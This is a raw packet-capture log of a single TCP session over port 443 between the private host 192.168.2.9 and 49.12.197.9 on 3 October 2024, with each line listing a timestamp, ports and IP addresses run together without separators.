                                                                                                                                                                            Oct 3, 2024 03:26:54.460223913 CEST4434971849.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:54.460483074 CEST49718443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:26:54.460490942 CEST4434971849.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:54.460545063 CEST49718443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:26:54.463159084 CEST4434971849.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:54.463179111 CEST4434971849.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:54.463330984 CEST49718443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:26:54.463339090 CEST4434971849.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:54.463399887 CEST49718443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:26:54.471117020 CEST4434971849.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:54.471138000 CEST4434971849.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:54.471271992 CEST49718443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:26:54.471271992 CEST49718443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:26:54.471281052 CEST4434971849.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:54.471400976 CEST49718443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:26:54.490191936 CEST4434971849.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:54.490214109 CEST4434971849.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:54.490607977 CEST49718443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:26:54.490621090 CEST4434971849.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:54.491008997 CEST49718443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:26:54.513659954 CEST4434971849.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:54.513685942 CEST4434971849.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:54.513983011 CEST49718443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:26:54.513983011 CEST49718443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:26:54.514004946 CEST4434971849.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:54.514048100 CEST49718443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:26:54.527374983 CEST4434971849.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:54.527406931 CEST4434971849.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:54.527501106 CEST49718443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:26:54.527512074 CEST4434971849.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:54.527538061 CEST49718443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:26:54.527551889 CEST49718443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:26:54.537020922 CEST4434971849.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:54.537043095 CEST4434971849.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:54.537141085 CEST49718443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:26:54.537149906 CEST4434971849.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:54.537870884 CEST49718443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:26:54.547171116 CEST4434971849.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:54.547193050 CEST4434971849.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:54.547354937 CEST49718443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:26:54.547364950 CEST4434971849.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:54.547544003 CEST49718443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:26:54.552791119 CEST4434971849.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:54.552826881 CEST4434971849.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:54.552963972 CEST49718443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:26:54.552963972 CEST49718443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:26:54.552975893 CEST4434971849.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:54.553024054 CEST49718443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:26:54.555990934 CEST4434971849.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:54.556014061 CEST4434971849.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:54.556211948 CEST49718443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:26:54.556221962 CEST4434971849.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:54.556493044 CEST49718443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:26:54.567888975 CEST4434971849.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:54.567914963 CEST4434971849.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:54.568080902 CEST49718443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:26:54.568092108 CEST4434971849.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:54.568403959 CEST49718443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:26:54.596718073 CEST4434971849.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:54.596740961 CEST4434971849.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:54.596836090 CEST49718443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:26:54.596863031 CEST4434971849.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:54.597040892 CEST49718443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:26:54.597040892 CEST49718443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:26:54.623697996 CEST4434971849.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:54.623722076 CEST4434971849.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:54.625130892 CEST49718443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:26:54.625130892 CEST49718443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:26:54.625143051 CEST4434971849.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:54.625247002 CEST49718443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:26:54.626946926 CEST4434971849.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:54.626967907 CEST4434971849.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:54.627044916 CEST49718443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:26:54.627051115 CEST4434971849.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:54.627104044 CEST49718443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:26:54.629597902 CEST4434971849.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:54.629620075 CEST4434971849.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:54.629698038 CEST49718443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:26:54.629704952 CEST4434971849.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:54.630975962 CEST49718443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:26:54.639986992 CEST4434971849.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:54.640008926 CEST4434971849.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:54.640237093 CEST49718443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:26:54.640237093 CEST49718443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:26:54.640245914 CEST4434971849.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:54.640284061 CEST49718443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:26:54.645147085 CEST4434971849.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:54.645169020 CEST4434971849.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:54.645225048 CEST49718443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:26:54.645232916 CEST4434971849.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:54.645354033 CEST49718443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:26:54.648504019 CEST4434971849.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:54.648524046 CEST4434971849.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:54.648597002 CEST49718443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:26:54.648597002 CEST49718443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:26:54.648605108 CEST4434971849.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:54.648641109 CEST49718443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:26:54.660304070 CEST4434971849.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:54.660326958 CEST4434971849.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:54.660372019 CEST49718443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:26:54.660378933 CEST4434971849.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:54.661503077 CEST49718443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:26:54.661503077 CEST49718443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:26:54.689388990 CEST4434971849.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:54.689412117 CEST4434971849.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:54.689621925 CEST49718443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:26:54.689630985 CEST4434971849.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:54.689681053 CEST49718443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:26:54.716094017 CEST4434971849.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:54.716115952 CEST4434971849.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:54.716511965 CEST49718443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:26:54.716525078 CEST4434971849.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:54.716711044 CEST49718443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:26:54.719628096 CEST4434971849.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:54.719649076 CEST4434971849.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:54.719746113 CEST49718443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:26:54.719746113 CEST49718443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:26:54.719753981 CEST4434971849.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:54.720010996 CEST49718443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:26:54.722064972 CEST4434971849.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:54.722086906 CEST4434971849.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:54.722196102 CEST49718443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:26:54.722203970 CEST4434971849.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:54.722243071 CEST49718443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:26:54.732395887 CEST4434971849.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:54.732425928 CEST4434971849.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:54.733057022 CEST49718443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:26:54.733057022 CEST49718443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:26:54.733067036 CEST4434971849.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:54.733133078 CEST49718443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:26:54.737812996 CEST4434971849.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:54.737835884 CEST4434971849.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:54.737895012 CEST49718443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:26:54.737901926 CEST4434971849.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:54.737920046 CEST49718443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:26:54.737934113 CEST49718443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:26:54.740938902 CEST4434971849.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:54.740962029 CEST4434971849.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:54.741039991 CEST49718443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:26:54.741039991 CEST49718443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:26:54.741048098 CEST4434971849.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:54.741101027 CEST49718443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:26:54.752871990 CEST4434971849.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:54.752892971 CEST4434971849.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:54.752953053 CEST49718443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:26:54.752959967 CEST4434971849.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:54.753007889 CEST49718443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:26:54.753007889 CEST49718443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:26:54.781763077 CEST4434971849.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:54.781784058 CEST4434971849.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:54.781963110 CEST49718443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:26:54.781975985 CEST4434971849.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:54.782114029 CEST49718443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:26:54.808619022 CEST4434971849.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:54.808656931 CEST4434971849.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:54.808710098 CEST49718443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:26:54.808710098 CEST49718443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:26:54.808718920 CEST4434971849.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:54.809043884 CEST49718443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:26:54.811908007 CEST4434971849.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:54.811942101 CEST4434971849.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:54.812042952 CEST49718443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:26:54.812042952 CEST49718443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:26:54.812057972 CEST4434971849.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:54.812098980 CEST49718443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:26:54.814477921 CEST4434971849.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:54.814500093 CEST4434971849.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:54.814609051 CEST49718443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:26:54.814615965 CEST4434971849.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:54.814651012 CEST49718443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:26:54.831199884 CEST4434971849.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:54.831224918 CEST4434971849.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:54.831289053 CEST49718443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:26:54.831290007 CEST49718443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:26:54.831304073 CEST4434971849.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:54.831355095 CEST49718443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:26:54.831662893 CEST4434971849.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:54.831685066 CEST4434971849.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:54.831794024 CEST49718443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:26:54.831794024 CEST49718443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:26:54.831801891 CEST4434971849.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:54.831836939 CEST49718443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:26:54.835355043 CEST4434971849.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:54.835377932 CEST4434971849.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:54.835419893 CEST49718443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:26:54.835427999 CEST4434971849.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:54.835447073 CEST49718443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:26:54.835535049 CEST49718443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:26:54.845582962 CEST4434971849.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:54.845609903 CEST4434971849.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:54.845665932 CEST49718443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:26:54.845665932 CEST49718443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:26:54.845674038 CEST4434971849.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:54.845789909 CEST49718443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:26:54.874653101 CEST4434971849.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:54.874675989 CEST4434971849.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:54.874813080 CEST49718443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:26:54.874813080 CEST49718443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:26:54.874821901 CEST4434971849.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:54.875339985 CEST49718443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:26:54.901140928 CEST4434971849.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:54.901165009 CEST4434971849.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:54.902060986 CEST49718443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:26:54.902075052 CEST4434971849.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:54.902232885 CEST49718443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:26:54.904583931 CEST4434971849.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:54.904612064 CEST4434971849.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:54.904742956 CEST49718443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:26:54.904752970 CEST4434971849.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:54.904807091 CEST49718443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:26:54.907023907 CEST4434971849.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:54.907061100 CEST4434971849.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:54.907123089 CEST49718443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:26:54.907133102 CEST4434971849.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:54.907155991 CEST49718443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:26:54.907170057 CEST49718443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:26:54.917694092 CEST4434971849.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:54.917721033 CEST4434971849.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:54.917769909 CEST49718443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:26:54.917778015 CEST4434971849.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:54.917830944 CEST49718443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:26:54.917830944 CEST49718443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:26:54.923326969 CEST4434971849.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:54.923355103 CEST4434971849.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:54.923547983 CEST49718443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:26:54.923554897 CEST4434971849.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:54.923612118 CEST49718443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:26:54.926182985 CEST4434971849.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:54.926208973 CEST4434971849.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:54.926265001 CEST49718443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:26:54.926271915 CEST4434971849.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:54.926310062 CEST49718443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:26:54.938158035 CEST4434971849.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:54.938183069 CEST4434971849.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:54.938252926 CEST49718443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:26:54.938260078 CEST4434971849.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:54.938316107 CEST49718443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:26:54.967685938 CEST4434971849.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:54.967715025 CEST4434971849.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:54.967844963 CEST49718443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:26:54.967844963 CEST49718443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:26:54.967854023 CEST4434971849.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:54.967962027 CEST49718443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:26:54.993536949 CEST4434971849.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:54.993567944 CEST4434971849.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:54.993650913 CEST49718443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:26:54.993657112 CEST4434971849.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:54.994055033 CEST49718443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:26:54.997047901 CEST4434971849.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:54.997076988 CEST4434971849.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:54.997127056 CEST49718443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:26:54.997133017 CEST4434971849.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:54.997174025 CEST49718443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:26:54.997174025 CEST49718443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:26:54.999486923 CEST4434971849.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:54.999507904 CEST4434971849.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:54.999782085 CEST49718443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:26:54.999789953 CEST4434971849.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:54.999872923 CEST49718443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:26:55.010067940 CEST4434971849.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:55.010091066 CEST4434971849.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:55.010250092 CEST49718443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:26:55.010257959 CEST4434971849.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:55.010565042 CEST49718443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:26:55.015749931 CEST4434971849.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:55.015774965 CEST4434971849.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:55.015851974 CEST49718443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:26:55.015858889 CEST4434971849.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:55.015887976 CEST49718443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:26:55.015887976 CEST49718443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:26:55.018582106 CEST4434971849.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:55.018604040 CEST4434971849.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:55.019120932 CEST49718443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:26:55.019120932 CEST49718443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:26:55.019128084 CEST4434971849.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:55.019251108 CEST49718443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:26:55.030797005 CEST4434971849.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:55.030824900 CEST4434971849.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:55.030980110 CEST49718443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:26:55.030987978 CEST4434971849.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:55.031411886 CEST49718443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:26:55.059873104 CEST4434971849.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:55.059894085 CEST4434971849.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:55.060220003 CEST49718443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:26:55.060230970 CEST4434971849.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:55.060673952 CEST49718443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:26:55.086258888 CEST4434971849.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:55.086280107 CEST4434971849.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:55.086333036 CEST49718443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:26:55.086344004 CEST4434971849.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:55.086400032 CEST49718443192.168.2.949.12.197.9
